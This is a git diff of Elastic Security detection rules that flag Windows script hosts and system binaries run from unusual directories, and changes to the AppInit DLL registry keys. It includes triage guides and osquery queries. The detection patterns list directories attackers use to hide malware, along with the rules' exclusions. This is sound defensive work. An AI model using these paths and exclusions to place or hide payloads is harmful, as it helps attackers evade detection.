name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of parent process executable and command line conditions.\n\n### Related rules\n\n- Process Execution from an Unusual Directory - ebfe1448-7fac-4d59-acea-181bd89b1f7f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"wscript.exe\",\n \"cscript.exe\",\n \"rundll32.exe\",\n \"regsvr32.exe\",\n \"cmstp.exe\",\n \"RegAsm.exe\",\n \"installutil.exe\",\n \"mshta.exe\",\n \"RegSvcs.exe\",\n \"powershell.exe\",\n \"pwsh.exe\",\n \"cmd.exe\") and\n\n /* add suspicious execution paths here */\n process.args : (\"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\Users\\\\Public\\\\*\",\n \"C:\\\\Windows\\\\Tasks\\\\*\",\n \"C:\\\\Intel\\\\*\",\n \"C:\\\\AMD\\\\Temp\\\\*\",\n \"C:\\\\Windows\\\\AppReadiness\\\\*\",\n \"C:\\\\Windows\\\\ServiceState\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"C:\\\\Windows\\\\Branding\\\\*\",\n \"C:\\\\Windows\\\\csc\\\\*\",\n \"C:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"C:\\\\Windows\\\\en-US\\\\*\",\n \"C:\\\\Windows\\\\wlansvc\\\\*\",\n \"C:\\\\Windows\\\\Prefetch\\\\*\",\n \"C:\\\\Windows\\\\Fonts\\\\*\",\n \"C:\\\\Windows\\\\diagnostics\\\\*\",\n \"C:\\\\Windows\\\\TAPI\\\\*\",\n \"C:\\\\Windows\\\\INF\\\\*\",\n \"C:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"C:\\\\windows\\\\tracing\\\\*\",\n \"c:\\\\windows\\\\IME\\\\*\",\n \"c:\\\\Windows\\\\Performance\\\\*\",\n \"c:\\\\windows\\\\intel\\\\*\",\n \"c:\\\\windows\\\\ms\\\\*\",\n \"C:\\\\Windows\\\\dot3svc\\\\*\",\n \"C:\\\\Windows\\\\panther\\\\*\",\n \"C:\\\\Windows\\\\RemotePackages\\\\*\",\n \"C:\\\\Windows\\\\OCR\\\\*\",\n \"C:\\\\Windows\\\\appcompat\\\\*\",\n \"C:\\\\Windows\\\\apppatch\\\\*\",\n \"C:\\\\Windows\\\\addins\\\\*\",\n \"C:\\\\Windows\\\\Setup\\\\*\",\n \"C:\\\\Windows\\\\Help\\\\*\",\n \"C:\\\\Windows\\\\SKB\\\\*\",\n \"C:\\\\Windows\\\\Vss\\\\*\",\n \"C:\\\\Windows\\\\servicing\\\\*\",\n \"C:\\\\Windows\\\\CbsTemp\\\\*\",\n \"C:\\\\Windows\\\\Logs\\\\*\",\n \"C:\\\\Windows\\\\WaaS\\\\*\",\n \"C:\\\\Windows\\\\twain_32\\\\*\",\n \"C:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"C:\\\\Windows\\\\ShellComponents\\\\*\",\n \"C:\\\\Windows\\\\PLA\\\\*\",\n \"C:\\\\Windows\\\\Migration\\\\*\",\n \"C:\\\\Windows\\\\debug\\\\*\",\n \"C:\\\\Windows\\\\Cursors\\\\*\",\n \"C:\\\\Windows\\\\Containers\\\\*\",\n \"C:\\\\Windows\\\\Boot\\\\*\",\n \"C:\\\\Windows\\\\bcastdvr\\\\*\",\n \"C:\\\\Windows\\\\TextInput\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\schemas\\\\*\",\n \"C:\\\\Windows\\\\SchCache\\\\*\",\n \"C:\\\\Windows\\\\Resources\\\\*\",\n \"C:\\\\Windows\\\\rescache\\\\*\",\n \"C:\\\\Windows\\\\Provisioning\\\\*\",\n \"C:\\\\Windows\\\\PrintDialog\\\\*\",\n \"C:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"C:\\\\Windows\\\\media\\\\*\",\n \"C:\\\\Windows\\\\Globalization\\\\*\",\n \"C:\\\\Windows\\\\L2Schemas\\\\*\",\n \"C:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"C:\\\\Windows\\\\ModemLogs\\\\*\",\n \"C:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"C:\\\\$Recycle.Bin\\\\*\") and\n\n /* noisy FP patterns */\n\n not process.parent.executable : (\"C:\\\\WINDOWS\\\\System32\\\\DriverStore\\\\FileRepository\\\\*\\\\igfxCUIService*.exe\",\n \"C:\\\\Windows\\\\System32\\\\spacedeskService.exe\",\n \"C:\\\\Program Files\\\\Dell\\\\SupportAssistAgent\\\\SRE\\\\SRE.exe\") and\n not (process.name : \"rundll32.exe\" and\n process.args : (\"uxtheme.dll,#64\",\n \"PRINTUI.DLL,PrintUIEntry\",\n \"?:\\\\Windows\\\\System32\\\\FirewallControlPanel.dll,ShowNotificationDialog\",\n \"?:\\\\WINDOWS\\\\system32\\\\Speech\\\\SpeechUX\\\\sapi.cpl\",\n \"?:\\\\Windows\\\\system32\\\\shell32.dll,OpenAs_RunDLL\")) and\n\n not (process.name : \"cscript.exe\" and process.args : \"?:\\\\WINDOWS\\\\system32\\\\calluxxprovider.vbs\") and\n\n not (process.name : \"cmd.exe\" and process.args : \"?:\\\\WINDOWS\\\\system32\\\\powercfg.exe\" and process.args : \"?:\\\\WINDOWS\\\\inf\\\\PowerPlan.log\") and\n\n not (process.name : \"regsvr32.exe\" and process.args : \"?:\\\\Windows\\\\Help\\\\OEM\\\\scripts\\\\checkmui.dll\") and\n\n not (process.name : \"cmd.exe\" and\n process.parent.executable : (\"?:\\\\Windows\\\\System32\\\\oobe\\\\windeploy.exe\",\n \"?:\\\\Program Files (x86)\\\\ossec-agent\\\\wazuh-agent.exe\",\n \"?:\\\\Windows\\\\System32\\\\igfxCUIService.exe\",\n \"?:\\\\Windows\\\\Temp\\\\IE*.tmp\\\\IE*-support\\\\ienrcore.exe\"))\n", "related_integrations": [ { @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "cff92c41-2225-4763-b4ce-6f71e5bda5e6", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_109.json b/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_109.json index 6e5f52cd7e0..b9e2bac7363 100644 --- a/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_109.json +++ b/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_109.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Execution from Unusual Directory - Command Line", - "note": "## Triage and analysis\n\n### Investigating Execution from Unusual Directory - Command Line\n\nThis rule looks for the execution of scripts from unusual directories. Attackers can use system or application paths to hide malware and make the execution less suspicious.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of parent process executable and command line conditions.\n\n### Related rules\n\n- Process Execution from an Unusual Directory - ebfe1448-7fac-4d59-acea-181bd89b1f7f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Execution from Unusual Directory - Command Line\n\nThis rule looks for the execution of scripts from unusual directories. Attackers can use system or application paths to hide malware and make the execution less suspicious.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of parent process executable and command line conditions.\n\n### Related rules\n\n- Process Execution from an Unusual Directory - ebfe1448-7fac-4d59-acea-181bd89b1f7f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"wscript.exe\",\n \"cscript.exe\",\n \"rundll32.exe\",\n \"regsvr32.exe\",\n \"cmstp.exe\",\n \"RegAsm.exe\",\n \"installutil.exe\",\n \"mshta.exe\",\n \"RegSvcs.exe\",\n \"powershell.exe\",\n \"pwsh.exe\",\n \"cmd.exe\") and\n\n /* add suspicious execution paths here */\n process.args : (\"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\Users\\\\Public\\\\*\",\n \"C:\\\\Windows\\\\Tasks\\\\*\",\n \"C:\\\\Intel\\\\*\",\n \"C:\\\\AMD\\\\Temp\\\\*\",\n \"C:\\\\Windows\\\\AppReadiness\\\\*\",\n \"C:\\\\Windows\\\\ServiceState\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"C:\\\\Windows\\\\Branding\\\\*\",\n \"C:\\\\Windows\\\\csc\\\\*\",\n \"C:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"C:\\\\Windows\\\\en-US\\\\*\",\n \"C:\\\\Windows\\\\wlansvc\\\\*\",\n \"C:\\\\Windows\\\\Prefetch\\\\*\",\n \"C:\\\\Windows\\\\Fonts\\\\*\",\n \"C:\\\\Windows\\\\diagnostics\\\\*\",\n \"C:\\\\Windows\\\\TAPI\\\\*\",\n \"C:\\\\Windows\\\\INF\\\\*\",\n \"C:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"C:\\\\windows\\\\tracing\\\\*\",\n \"c:\\\\windows\\\\IME\\\\*\",\n \"c:\\\\Windows\\\\Performance\\\\*\",\n \"c:\\\\windows\\\\intel\\\\*\",\n \"c:\\\\windows\\\\ms\\\\*\",\n \"C:\\\\Windows\\\\dot3svc\\\\*\",\n \"C:\\\\Windows\\\\panther\\\\*\",\n \"C:\\\\Windows\\\\RemotePackages\\\\*\",\n \"C:\\\\Windows\\\\OCR\\\\*\",\n \"C:\\\\Windows\\\\appcompat\\\\*\",\n \"C:\\\\Windows\\\\apppatch\\\\*\",\n \"C:\\\\Windows\\\\addins\\\\*\",\n \"C:\\\\Windows\\\\Setup\\\\*\",\n \"C:\\\\Windows\\\\Help\\\\*\",\n \"C:\\\\Windows\\\\SKB\\\\*\",\n \"C:\\\\Windows\\\\Vss\\\\*\",\n \"C:\\\\Windows\\\\servicing\\\\*\",\n \"C:\\\\Windows\\\\CbsTemp\\\\*\",\n \"C:\\\\Windows\\\\Logs\\\\*\",\n \"C:\\\\Windows\\\\WaaS\\\\*\",\n \"C:\\\\Windows\\\\twain_32\\\\*\",\n \"C:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"C:\\\\Windows\\\\ShellComponents\\\\*\",\n \"C:\\\\Windows\\\\PLA\\\\*\",\n \"C:\\\\Windows\\\\Migration\\\\*\",\n \"C:\\\\Windows\\\\debug\\\\*\",\n \"C:\\\\Windows\\\\Cursors\\\\*\",\n \"C:\\\\Windows\\\\Containers\\\\*\",\n \"C:\\\\Windows\\\\Boot\\\\*\",\n \"C:\\\\Windows\\\\bcastdvr\\\\*\",\n \"C:\\\\Windows\\\\TextInput\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\schemas\\\\*\",\n \"C:\\\\Windows\\\\SchCache\\\\*\",\n \"C:\\\\Windows\\\\Resources\\\\*\",\n \"C:\\\\Windows\\\\rescache\\\\*\",\n \"C:\\\\Windows\\\\Provisioning\\\\*\",\n \"C:\\\\Windows\\\\PrintDialog\\\\*\",\n \"C:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"C:\\\\Windows\\\\media\\\\*\",\n \"C:\\\\Windows\\\\Globalization\\\\*\",\n \"C:\\\\Windows\\\\L2Schemas\\\\*\",\n \"C:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"C:\\\\Windows\\\\ModemLogs\\\\*\",\n \"C:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"C:\\\\$Recycle.Bin\\\\*\") and\n\n /* noisy FP patterns */\n\n not process.parent.executable : (\"C:\\\\WINDOWS\\\\System32\\\\DriverStore\\\\FileRepository\\\\*\\\\igfxCUIService*.exe\",\n \"C:\\\\Windows\\\\System32\\\\spacedeskService.exe\",\n \"C:\\\\Program Files\\\\Dell\\\\SupportAssistAgent\\\\SRE\\\\SRE.exe\") and\n not (process.name : \"rundll32.exe\" and\n process.args : (\"uxtheme.dll,#64\",\n \"PRINTUI.DLL,PrintUIEntry\",\n \"?:\\\\Windows\\\\System32\\\\FirewallControlPanel.dll,ShowNotificationDialog\",\n \"?:\\\\WINDOWS\\\\system32\\\\Speech\\\\SpeechUX\\\\sapi.cpl\",\n \"?:\\\\Windows\\\\system32\\\\shell32.dll,OpenAs_RunDLL\")) and\n\n not (process.name : \"cscript.exe\" and process.args : \"?:\\\\WINDOWS\\\\system32\\\\calluxxprovider.vbs\") and\n\n not (process.name : \"cmd.exe\" and process.args : \"?:\\\\WINDOWS\\\\system32\\\\powercfg.exe\" and process.args : \"?:\\\\WINDOWS\\\\inf\\\\PowerPlan.log\") and\n\n not (process.name : \"regsvr32.exe\" and process.args : \"?:\\\\Windows\\\\Help\\\\OEM\\\\scripts\\\\checkmui.dll\") and\n\n not (process.name : \"cmd.exe\" and\n process.parent.executable : (\"?:\\\\Windows\\\\System32\\\\oobe\\\\windeploy.exe\",\n \"?:\\\\Program Files (x86)\\\\ossec-agent\\\\wazuh-agent.exe\",\n \"?:\\\\Windows\\\\System32\\\\igfxCUIService.exe\",\n \"?:\\\\Windows\\\\Temp\\\\IE*.tmp\\\\IE*-support\\\\ienrcore.exe\"))\n", "related_integrations": [ { @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "cff92c41-2225-4763-b4ce-6f71e5bda5e6", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/cffbaf47-9391-4e09-a83c-1f27d7474826_1.json b/packages/security_detection_engine/kibana/security_rule/cffbaf47-9391-4e09-a83c-1f27d7474826_1.json index 852cabf837d..8b9d49adb52 100644 --- a/packages/security_detection_engine/kibana/security_rule/cffbaf47-9391-4e09-a83c-1f27d7474826_1.json +++ b/packages/security_detection_engine/kibana/security_rule/cffbaf47-9391-4e09-a83c-1f27d7474826_1.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_4.json b/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_4.json index 533bbb0aba6..6afe7eba144 100644 --- a/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_4.json +++ b/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_4.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_5.json b/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_5.json index 3920fd00fcd..282ff88b790 100644 --- a/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_5.json +++ b/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_5.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_6.json b/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_6.json index cfea06b87fc..e3692db56fa 100644 --- a/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_6.json +++ b/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_6.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_7.json b/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_7.json index a3fac00b3b3..06c14fe8d14 100644 --- a/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_7.json +++ b/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_7.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_8.json b/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_8.json index b639672bfff..abdf7a91267 100644 --- a/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_8.json +++ b/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_8.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/d0b0f3ed-0b37-44bf-adee-e8cb7de92767_1.json b/packages/security_detection_engine/kibana/security_rule/d0b0f3ed-0b37-44bf-adee-e8cb7de92767_1.json index 58d9466e20f..f3f6ab86b12 100644 --- a/packages/security_detection_engine/kibana/security_rule/d0b0f3ed-0b37-44bf-adee-e8cb7de92767_1.json +++ b/packages/security_detection_engine/kibana/security_rule/d0b0f3ed-0b37-44bf-adee-e8cb7de92767_1.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_102.json b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_102.json index 12dcbb34967..6971ced8457 100644 --- a/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_102.json +++ b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_102.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Registry Persistence via AppInit DLL", - "note": "## Triage and analysis\n\n### Investigating Registry Persistence via AppInit DLL\n\nAppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads `user32.dll`) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications.\n\nAttackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.\n\nThis rule identifies modifications on the AppInit registry keys.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related DLL file tied to the Windows Registry entry.\n - Check whether the DLL is signed, and tied to a authorized program used on your environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve all DLLs under the AppInit registry keys:\n - $osquery_0\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable and the DLLs using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_1\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_2\n - $osquery_3\n - $osquery_4\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet 